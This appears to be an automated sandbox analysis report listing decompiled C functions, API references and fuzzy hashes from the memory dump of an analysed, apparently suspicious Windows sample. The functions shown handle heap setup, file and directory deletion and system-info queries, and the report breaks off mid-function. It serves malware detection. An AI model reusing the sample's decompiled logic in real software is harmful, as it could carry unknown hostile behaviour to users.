Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: ChangeCloseFindFreeHeapNotification
String ID:
API String ID: 1642550653-0
Opcode ID: 1101ea52ee8bc232e257b11b4dfa0e022e50a41f92f453deb7857e88e1fe02c5
Instruction ID: 4b594e9f44d889535f58429decad5894e80191ff52abe98a3990b8650259e3e7
Opcode Fuzzy Hash: 1101ea52ee8bc232e257b11b4dfa0e022e50a41f92f453deb7857e88e1fe02c5
Instruction Fuzzy Hash: 45F08272505700ABC7222B99FC05F8BBB72EB91764F12893AF610210F8C7355861DB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040E080, Relevance: 3.0, APIs: 2, Instructions: 30
memoryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040E080(void* __ecx, void** _a4, wchar_t* _a8) {
				int _v8;
				void* _t11;
				void* _t14;
				void* _t15;

				_push(__ecx);
				if(_a8 != 0) {
					_v8 = wcslen(_a8);
					_t14 =  *0x417720; // 0x2760000
					_t15 = RtlAllocateHeap(_t14, 0, _v8 + _v8 + 0xa); // executed
					 *_a4 = _t15;
					return E0040E300(_a4,  *_a4, _a8, _v8);
				}
				return _t11;
			}

0x0040e083
0x0040e088
0x0040e096
0x0040e0a3
0x0040e0a9
0x0040e0b2
0x00000000
0x0040e0c2
0x0040e0ca

APIs

wcslen.MSVCRT ref: 0040E08E
RtlAllocateHeap.NTDLL(02760000,00000000,?,?,00000000,00000000), ref: 0040E0A9

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeapwcslen
String ID:
API String ID: 1345907364-0
Opcode ID: bd3817357f8dc300cfda1f4fd49e484fb32d964938a6f4784871a1af5a5f73de
Instruction ID: e6fe68c807464946a1ef8a296932015239fd020affbeb5486113503193b7cc98
Opcode Fuzzy Hash: bd3817357f8dc300cfda1f4fd49e484fb32d964938a6f4784871a1af5a5f73de
Instruction Fuzzy Hash: 76F05EB5600208FFCB00DFA5D844E9A77B9EB88718F10C46DF9188B380D675EA01CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00401FA9, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00401FA9(void* __ebx) {
				char _v8;

				_push(0);
				E0040DF60();
				if(_v8 == 1) {
					__eax = E004053C7( *0x417010);
					if(__eax != 0) {
						__eax = E00405436( *0x417010);
					}
				}
				E0040A787( *0x417068);
				E0040A787( *0x417058);
				E004034D1();
				E0040A787( *0x417038);
				RemoveDirectoryW( *0x417024); // executed
				RemoveDirectoryW( *0x417070); // executed
				_push(_v8);
				ExitProcess(); // executed
				E0040DE00(); // executed
				HeapDestroy( *0x417008); // executed
				ExitProcess(??); // executed
				E00405379();
				E004098F0();
				E0040A655();
				E0040D264(E0040AA30());
				return E00409AD0();
			}

0x00401fac
0x00401fad
0x00401fb8
0x00401fc0
0x00401fc7
0x00401fcf
0x00401fcf
0x00401fc7
0x00401fda
0x00401fe5
0x00401fea
0x00401ff5
0x00402000
0x0040200b
0x00402010
0x004011a5
0x004011aa
0x004011b5
0x004011ba
0x004011bf
0x004011c4
0x004011c9
0x004011d3
0x004011dd

APIs

Part of subcall function 0040DF60: TlsGetValue.KERNEL32(0000001B,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,0041606C,00000008,0000000C), ref: 0040DF77

RemoveDirectoryW.KERNEL32(00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002,00000000,00000000,00416020,00000001,00000000), ref: 00402000
RemoveDirectoryW.KERNEL32(00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002,00000000,00000000,00416020,00000001,00000000), ref: 0040200B

Part of subcall function 004053C7: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,00401FC5,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002,00000000), ref: 004053D7

Part of subcall function 00405436: TerminateThread.KERNEL32(00000000,00000000,00000000,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000), ref: 00405446
Part of subcall function 00405436: EnterCriticalSection.KERNEL32(004176A0,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405452
Part of subcall function 00405436: LeaveCriticalSection.KERNEL32(004176A0,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405486

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalDirectoryRemoveSection$EnterLeaveObjectSingleTerminateThreadValueWait
String ID:
API String ID: 1205394408-0
Opcode ID: a4995793a58d15065b79c121d9b25a2068aad365eb3bcf9e7b176d1495691666
Instruction ID: 98356af5a986153e62a16f1a7b9a52d9cbcc3c42f58cdbaee6b44a4a02fae465
Opcode Fuzzy Hash: a4995793a58d15065b79c121d9b25a2068aad365eb3bcf9e7b176d1495691666
Instruction Fuzzy Hash: D1F0C03155C701AADA257B32DC8299A3F76EB08348B51C43AF851714F2CB3E9C61AE1E

Uniqueness

Uniqueness Score: -1.00%

Function 0040A759, Relevance: 3.0, APIs: 2, Instructions: 12
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A759(WCHAR* _a4, signed char _a8) {
				int _t8;

				if(_a4 == 0) {
					return 0;
				}
				if((_a8 & 0x00000002) != 0) {
					SetFileAttributesW(_a4, 0x80);
				}
				_t8 = DeleteFileW(_a4); // executed
				return _t8;
			}

0x0040a75e
0x00000000
0x0040a782
0x0040a765
0x0040a770
0x0040a770
0x0040a77a
0x00000000

APIs

SetFileAttributesW.KERNEL32(00000002,00000080,0040A792,02769340,00000000,00401FDF,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000), ref: 0040A770
DeleteFileW.KERNELBASE(00000000,0040A792,02769340,00000000,00401FDF,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 0040A77A

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AttributesDelete
String ID:
API String ID: 2910425767-0
Opcode ID: d20dcc2b1ea866854d894abaed1435a963998bb33ced13a9451e631658276eaf
Instruction ID: 32816558c3505e2600197b6aa1c8e1867431839d95d1f98e5f62e5383a3a81ae
Opcode Fuzzy Hash: d20dcc2b1ea866854d894abaed1435a963998bb33ced13a9451e631658276eaf
Instruction Fuzzy Hash: ECD06730148301A6D2555B20D90D79A7AB16B80786F15C829B485510F5C778C865E60B

Uniqueness

Uniqueness Score: -1.00%

Function 0040DDD0, Relevance: 3.0, APIs: 2, Instructions: 12
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040DDD0() {
				void* _t1;
				void* _t4;

				_t1 = HeapCreate(0, 0x1000, 0); // executed
				 *0x417720 = _t1;
				 *0x416170 = TlsAlloc();
				return E0040E600(_t4);
			}

0x0040dddc
0x0040dde2
0x0040dded
0x0040ddf8

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00401053,00000000,00001000,00000000,00000000), ref: 0040DDDC
TlsAlloc.KERNEL32(?,00401053,00000000,00001000,00000000,00000000), ref: 0040DDE7

Part of subcall function 0040E600: HeapAlloc.KERNEL32(02760000,00000000,0000000C,?,?,0040DDF7,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E60E
Part of subcall function 0040E600: HeapAlloc.KERNEL32(02760000,00000000,00000010,?,?,0040DDF7,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E622
Part of subcall function 0040E600: TlsSetValue.KERNEL32(0000001B,00000000,?,?,0040DDF7,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E64B

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocHeap$CreateValue
String ID:
API String ID: 493873155-0
Opcode ID: 4e641117bd55311371697391a61bc67f1fb8624d6db014dbb9304ac05d49361e
Instruction ID: 18e5a0edc7d50c2b567692700943758183887443e0587578baab4a09ae3a6d99
Opcode Fuzzy Hash: 4e641117bd55311371697391a61bc67f1fb8624d6db014dbb9304ac05d49361e
Instruction Fuzzy Hash: C9D0127454430467D6002FB1BC0E7843B68B708B46F514C35F619962D1DBB5A000C51C

Uniqueness

Uniqueness Score: -1.00%

Function 0040DE00, Relevance: 3.0, APIs: 2, Instructions: 10
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040DE00() {
				void* _t1;
				int _t3;
				long _t4;

				_t1 =  *0x417720; // 0x2760000
				HeapDestroy(_t1);
				_t4 =  *0x416170; // 0x1b
				_t3 = TlsFree(_t4); // executed
				return _t3;
			}

0x0040de03
0x0040de09
0x0040de0f
0x0040de16
0x0040de1d

APIs

HeapDestroy.KERNELBASE(02760000,?,004011AF,00000000,00417040,00000000,00000000,00000004,00000000,0041606C,00000008,0000000C,000186A1,00000007,0041607C,00417090), ref: 0040DE09
TlsFree.KERNELBASE(0000001B,?,004011AF,00000000,00417040,00000000,00000000,00000004,00000000,0041606C,00000008,0000000C,000186A1,00000007,0041607C,00417090), ref: 0040DE16

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: DestroyFreeHeap
String ID:
API String ID: 3293292866-0
Opcode ID: 3f3b1d22445732031eefca4f0308cde2def4a668abbc152b937948c22d9ea38e
Instruction ID: e62e0040ee13618bc64e974affb29b49c4e8111c40791418b11bddbb2c9937d4
Opcode Fuzzy Hash: 3f3b1d22445732031eefca4f0308cde2def4a668abbc152b937948c22d9ea38e
Instruction Fuzzy Hash: 6AC04C75154304AFCB049BA5FC48CA5377DF74C6117468428B61A83661CA35F400CB6C

Uniqueness

Uniqueness Score: -1.00%

Function 00402BFA, Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00402BFA(void* __eflags, intOrPtr _a8) {
				intOrPtr _v0;
				intOrPtr _v8;
				WCHAR* _v16;
				WCHAR* _v20;
				char _v24;
				intOrPtr _v36;
				void* _t17;
				void* _t23;
				void* _t25;
				void* _t26;
				void* _t27;
				intOrPtr _t31;
				intOrPtr _t32;
				void* _t35;
				void* _t36;
				intOrPtr* _t37;

				_push(0);
				_push(0);
				_push(0);
				E004051A0(E0040DF60(), _a8);
				_t31 = _v0;
				E00405060(_t37, _t31);
				_v16 = E00409B40(0x2710);
				GetShortPathNameW(_v20, _v16, 0x2710); // executed
				_t17 = E0040DE20();
				_t32 = _t31;
				_push(_t17);
				E00409BB0(_v16, 0xffffffff, E0040DE20());
				E0040DE60( &_v24, _t32);
				E00409B20(_v36);
				_push(_v36);
				_t23 = E0040DE20();
				_pop(_t35);
				E0040DFC0(_t35);
				_t25 = _t23;
				_t26 = E00405170();
				_t36 = _t25;
				_t27 = _t26 + _t36;
				return E0040DEF0(E0040DEF0(_t27,  *_t37), _v8);
			}

APIs

Part of subcall function 0040DF60: TlsGetValue.KERNEL32(0000001B,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,0041606C,00000008,0000000C), ref: 0040DF77

Part of subcall function 00409B40: RtlAllocateHeap.NTDLL(00000008,00000000,00402F00,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000,00000000,00000000), ref: 00409B51

GetShortPathNameW.KERNEL32 ref: 00402C34

Part of subcall function 0040DE20: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE26
Part of subcall function 0040DE20: TlsGetValue.KERNEL32(0000001B), ref: 0040DE35
Part of subcall function 0040DE20: SetLastError.KERNEL32(?), ref: 0040DE4B

Part of subcall function 0040DE60: TlsGetValue.KERNEL32(0000001B,00000000,00000000), ref: 0040DE6C
Part of subcall function 0040DE60: RtlAllocateHeap.NTDLL(02760000,00000000,?), ref: 0040DE99

Part of subcall function 00409B20: RtlFreeHeap.NTDLL(00000000,00000000,00401B6B,00000000,00000000,?,00000000,00000000,00416020,00000000,00000000,?,00000000,?,00000000,00000000), ref: 00409B2C

Part of subcall function 0040DFC0: wcslen.MSVCRT ref: 0040DFD7

Part of subcall function 00405170: TlsGetValue.KERNEL32(?,?,00402FED,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000), ref: 00405178

Part of subcall function 0040DEF0: HeapFree.KERNEL32(02760000,00000000,00000000,?,00000000,?,00411AC4,00000000,00000000,-00000008), ref: 0040DF08

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapValue$AllocateErrorFreeLast$NamePathShortwcslen
String ID:
API String ID: 192546213-0
Opcode ID: 49f9ea41b9916b6beaa403a6b7ca882e3139740148ba2b07ebcafa5c299e2020
Instruction ID: acf91f0b192621483340f6d99b68dad878881d8e8b7377b9fd1201c82249adf8
Opcode Fuzzy Hash: 49f9ea41b9916b6beaa403a6b7ca882e3139740148ba2b07ebcafa5c299e2020
Instruction Fuzzy Hash: E10140755086017AD5007BB1DD06D3F7669EFD0718F10C83FB444B90E2CA3C9C55AA5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040A9E0, Relevance: 1.5, APIs: 1, Instructions: 25
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A9E0(void** _a4) {
				long _v4;
				void** _t18;

				_t18 = _a4;
				_v4 = 0;
				if(_t18[5] != 0) {
					return 0;
				} else {
					WriteFile( *_t18, _t18[1], _t18[2] - _t18[3],  &_v4, 0); // executed
					_t18[3] = _t18[2];
					return _v4;
				}
			}

0x0040a9e2
0x0040a9e6
0x0040a9f2
0x0040aa20
0x0040a9f4
0x0040aa07
0x0040aa10
0x0040aa19
0x0040aa19

APIs

WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,?,0040A9A8,00000000,00000000,?,?,004033E8,00000000,00000000,00000800), ref: 0040AA07

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 6b8f9e37b353b02e3b6cb8ff0ca601f404a0ed7efcad3d3714d276d4546e1b8c
Instruction ID: 14d3056ca1924aee99cb04667f0b380ac70d83ad29f9bf771d01894620e497e9
Opcode Fuzzy Hash: 6b8f9e37b353b02e3b6cb8ff0ca601f404a0ed7efcad3d3714d276d4546e1b8c
Instruction Fuzzy Hash: CBF09276105700AFD720DF58D948B87B7E8EB58721F10C82EE59AD2690C770E854DB55

Uniqueness

Uniqueness Score: -1.00%

Function 00402BC1, Relevance: 1.5, APIs: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00402BC1() {
				void* _t3;
				void* _t4;
				short* _t6;

				_t4 = 9;
				do {
					_t6 = _t6 - 4;
					 *_t6 = 0;
					_t4 = _t4 - 1;
				} while (_t4 != 0);
				E0040DF60();
				_push(_t6); // executed
				L004050E2(); // executed
				if( *_t6 == 0) {
					_t3 = 0;
				} else {
					_t3 = 1;
				}
				return _t3;
			}

0x00402bc2
0x00402bc7
0x00402bc7
0x00402bca
0x00402bd1
0x00402bd1
0x00402bd4
0x00402bdc
0x00402bdd
0x00402bea
0x00402bf3
0x00402bec
0x00402bec
0x00402bec
0x00402bf9

APIs

GetNativeSystemInfo.KERNEL32(00000000,?,00000000,00000000), ref: 00402BDD

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 2444bb81d38c9911cb4f1a5182d85b53aad325570cca22d2bb76f9bc2955ed15
Instruction ID: 8a645f6298b96527a3a9e5c011dcec852996ed75ec820e929ccd6a5cacf3a2a4
Opcode Fuzzy Hash: 2444bb81d38c9911cb4f1a5182d85b53aad325570cca22d2bb76f9bc2955ed15
Instruction Fuzzy Hash: 5FD0126081824986D750BE75850979BB3ECE704304F60887AE085565C1F7FCE9D99657

Uniqueness

Uniqueness Score: -1.00%

Function 00409B40, Relevance: 1.5, APIs: 1, Instructions: 10
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409B40(long _a4) {
				long _t2;
				void* _t4;

				_t2 = _a4;
				if(_t2 <= 0) {
					return 0;
				} else {
					_t4 = RtlAllocateHeap( *0x417710, 8, _t2); // executed
					return _t4;
				}
			}

0x00409b40
0x00409b46
0x00409b5c
0x00409b48
0x00409b51
0x00409b57
0x00409b57

APIs

RtlAllocateHeap.NTDLL(00000008,00000000,00402F00,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000,00000000,00000000), ref: 00409B51

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 42056730f6e44905a5b02c626e95f603851e4ed678fa30f00f02d4f5107f6242
Instruction ID: 0e995b311a0039e38a6c1dd281e12789fe5386c316f45d3f47623ba04496a456
Opcode Fuzzy Hash: 42056730f6e44905a5b02c626e95f603851e4ed678fa30f00f02d4f5107f6242
Instruction Fuzzy Hash: 7FC04C713542007AD6519B24AE49F5776A9BB70B42F01C8357655E21A5DB30EC10D728

Uniqueness

Uniqueness Score: -1.00%

Function 0040D264, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D264(void* __eax) {
				int _t2;

				if( *0x416016 == 0) {
					if( *0x41760c != 0) {
						_t2 = TlsFree( *0x417610); // executed
						return _t2;
					}
					return __eax;
				} else {
					return __eax;
				}
			}

0x0040d26b
0x0040d279
0x0040d281
0x00000000
0x0040d281
0x0040d287
0x0040d271
0x0040d271
0x0040d271

APIs

TlsFree.KERNELBASE(004011D8,004011AA,00000000,00417040,00000000,00000000,00000004,00000000,0041606C,00000008,0000000C,000186A1,00000007,0041607C,00417090,00000004), ref: 0040D281

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: Free
String ID:
API String ID: 3978063606-0
Opcode ID: bb41ee82512545f6e7d13b4e06803ace2dd4b01e4fc7f0f7d78b6f5c3289525c
Instruction ID: 63d9cdb861c42e783f8d559f8bae438e046b2b0141e059cefbd137daa8fd129e
Opcode Fuzzy Hash: bb41ee82512545f6e7d13b4e06803ace2dd4b01e4fc7f0f7d78b6f5c3289525c
Instruction Fuzzy Hash: 2EC00270515500DADF268B49ED0C7D53A71A744315F4589B9D405111F4C3788848DE4C

Uniqueness

Uniqueness Score: -1.00%

Function 00409AE0, Relevance: 1.5, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409AE0() {
				void* _t1;

				_t1 = HeapCreate(0, 0x1000, 0); // executed
				 *0x417710 = _t1;
				return _t1;
			}

0x00409ae9
0x00409aef
0x00409af4

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 00409AE9

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 32b04c5618a60dd8e1d20f587a5187d242f7e9eed40007270aac00d2dcc3d6b4
Instruction ID: 76b444b78102f1190b75b28dd56e974357e96cc3189ac6b4b6122ebffb005697
Opcode Fuzzy Hash: 32b04c5618a60dd8e1d20f587a5187d242f7e9eed40007270aac00d2dcc3d6b4
Instruction Fuzzy Hash: ACB0127038434056E2110B109C06B803520B304F83F104420F211581D4C7E02000C60C

Uniqueness

Uniqueness Score: -1.00%

Function 00409B20, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409B20(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x417710, 0, _a4); // executed
				return _t2;
			}

0x00409b2c
0x00409b32

APIs

RtlFreeHeap.NTDLL(00000000,00000000,00401B6B,00000000,00000000,?,00000000,00000000,00416020,00000000,00000000,?,00000000,?,00000000,00000000), ref: 00409B2C

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: f3e3bcd985b7116f2e278ca1f63563343cb74ac780ccfe8d01fc63c74dc0a7b9
Instruction ID: fe9ec2d3ce91f197954555b3d321bf450e8b3086e077a3996b15cea7c2da6c74
Opcode Fuzzy Hash: f3e3bcd985b7116f2e278ca1f63563343cb74ac780ccfe8d01fc63c74dc0a7b9
Instruction Fuzzy Hash: 7CB01275205100BFCA024B00FF04F457E32F750B00F01C830B214000F4C3315420EB0C

Uniqueness

Uniqueness Score: -1.00%

Function 00409AD0, Relevance: 1.5, APIs: 1, Instructions: 3
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409AD0() {
				int _t1;

				_t1 = HeapDestroy( *0x417710); // executed
				return _t1;
			}

0x00409ad6
0x00409adc

APIs

HeapDestroy.KERNELBASE(004011DD,004011AA,00000000,00417040,00000000,00000000,00000004,00000000,0041606C,00000008,0000000C,000186A1,00000007,0041607C,00417090,00000004), ref: 00409AD6

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: DestroyHeap
String ID:
API String ID: 2435110975-0
Opcode ID: 399ded8a1eb3f59c66d2f2ff06fdc53af96f34c45b587ce090dbf8798a82475b
Instruction ID: 92ce44880fa00836fd9ec8e9b77f21ccdd2dda276c3d59ffa7e3325814399483
Opcode Fuzzy Hash: 399ded8a1eb3f59c66d2f2ff06fdc53af96f34c45b587ce090dbf8798a82475b
Instruction Fuzzy Hash: B19002305140008FDE435B10ED489843B35F74134170288709022850B0C7255450DB1C

Uniqueness

Uniqueness Score: -1.00%

Function 00411680, Relevance: 1.3, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411680(signed int _a8, signed int _a12) {
				void* _t5;

				_t5 = malloc(_a8 * _a12); // executed
				return _t5;
			}

0x0041168a
0x00411693

APIs

malloc.MSVCRT ref: 0041168A

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 79a084c717a70a2b6305951e947b0b2a2d876109babb2668130023696ffd0b55
Instruction ID: a7d40c5f4997ffdb313d2f9b6f16fb7c047b00c477a8a3c9f473b961936b746c
Opcode Fuzzy Hash: 79a084c717a70a2b6305951e947b0b2a2d876109babb2668130023696ffd0b55
Instruction Fuzzy Hash: 9FB09275404202AFCA04CB54EA8980ABBA8AE90210F818824F04A8A021C234E1148A0B

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00408F09, Relevance: 65.0, APIs: 32, Strings: 5, Instructions: 270
windowregistrymemoryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00408F09(void* __ecx, void* __edx, void* __eflags, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, signed char _a16, intOrPtr _a20) {
				struct _WNDCLASSEXW _v48;
				struct tagMSG _v76;
				short _v78;
				short _v80;
				char _v82;
				struct tagACCEL _v88;
				WCHAR* _v92;
				void* _v96;
				wchar_t* _v104;
				struct HINSTANCE__* _t48;
				WCHAR* _t51;
				struct HWND__* _t56;
				struct HWND__* _t57;
				int _t58;
				int _t62;
				struct HWND__* _t74;
				struct HWND__* _t76;
				struct HWND__* _t80;
				short _t82;
				short _t84;
				int _t105;
				WCHAR* _t110;
				struct HWND__* _t111;
				void* _t112;
				void* _t116;
				wchar_t* _t117;
				struct HACCEL__* _t122;
				int _t130;

				_t116 = __edx;
				_t112 = __ecx;
				_v96 = 0;
				_t110 = E00408DF8(_a4);
				_v92 = _t110;
				_a4 = E00408DF8(_a8);
				_t117 = E00408DF8(_a12);
				_t130 =  *0x4170c4; // 0x0
				if(_t130 == 0) {
					 *0x4170c4 = GetStockObject(0x11);
				}
				_t48 =  *0x41700c; // 0x400000
				_v48.cbSize = 0x30;
				_v48.style = 3;
				_v48.lpfnWndProc = E00408E54;
				_v48.cbClsExtra = 0;
				_v48.cbWndExtra = 0;
				_v48.hInstance = _t48;
				_v48.hIcon = LoadIconW(_t48, 1);
				_v48.hCursor = LoadCursorW(0, 0x7f00);
				_t51 =  *0x416114; // 0x412044
				_v48.lpszClassName = _t51;
				_v48.hbrBackground = 0x10;
				_v48.lpszMenuName = 0;
				_v48.hIconSm = 0;
